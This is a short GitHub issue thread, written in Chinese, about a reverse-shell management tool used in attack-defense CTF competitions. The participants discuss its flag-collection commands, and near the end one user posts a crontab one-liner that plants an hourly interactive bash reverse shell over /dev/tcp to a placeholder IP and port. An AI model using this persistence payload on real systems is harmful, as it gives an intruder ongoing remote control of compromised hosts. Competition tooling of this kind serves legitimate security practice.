### ISSUE TITLE
[?] Flag 功能咨询

### ISSUE THREAD

**Issue by xMario0** [WangYihang/Reverse-Shell-Manager#1]
flag 那块还没完善好吧。

**Comment by WangYihang** [comment]
不好意思 , 刚才检查了一下 , 可能之前代码中的显示帮助的函数和判断输出的函数有一点不匹配
现在已经修复
```
输入 gf (get flag) , 即可获取当前节点的 flag
输入 gaf (get all flag) ,可以对当前在线的节点批量获取 flag
```

**Comment by xMario0** [comment]
感觉，flag获取到本地应该好点吧 - -

**Comment by WangYihang** [comment]
那就用 cl 命令呗 , 个人感觉被动接收 flag 要更加隐蔽一些 , 多谢大佬提醒

**Comment by xMario0** [comment]
跟你学习呢 - -拿你的再改改比赛用哈哈

**Comment by xMario0** [comment]
(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/IP/port;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

**Comment by WangYihang** [comment]
wow , 可以的 , 这个很简洁啊 , 学习了
